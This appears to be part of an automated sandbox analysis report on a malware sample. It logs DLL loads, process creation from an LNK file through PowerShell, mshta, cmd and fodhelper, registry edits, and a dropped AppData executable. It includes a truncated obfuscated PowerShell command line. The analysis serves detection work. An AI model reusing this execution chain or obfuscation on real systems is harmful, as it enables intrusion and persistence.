          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: version.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: netapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: winmmbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: mmdevapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: devobj.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: ksuser.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: avrt.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: audioses.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: powrprof.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: umpdc.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: msacm32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: midimap.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: mpr.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: wininet.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: rasman.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: samcli.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: avifil32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: msvfw32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: cryptui.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: wtsapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: winsta.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: firewallapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: fwbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: sxs.dll
          Source: C:\Users\user\AppData\Roaming\mama.exe | Section loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: msxml6.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded: version.dll
          Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
          Source: A4FY1OA97K.lnk | LNK file: ..\..\..\Windows\System32\OpenSSH\ssh.exe
          Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\System32\fodhelper.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

          Data Obfuscation

          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf...
          Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: 46_2_03525340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory
          Source: mama.exe.16.dr | Static PE information: section name: .didata

          Persistence and Installation Behavior

          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\mshta.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\mshta.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\System32\cmd.exe
          Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\mama.exe

          Hooking and other Techniques for Hiding and Protection

          Source: mama.exe, 0000002E.00000003.1674843230.000000007E870000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: torConnect
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
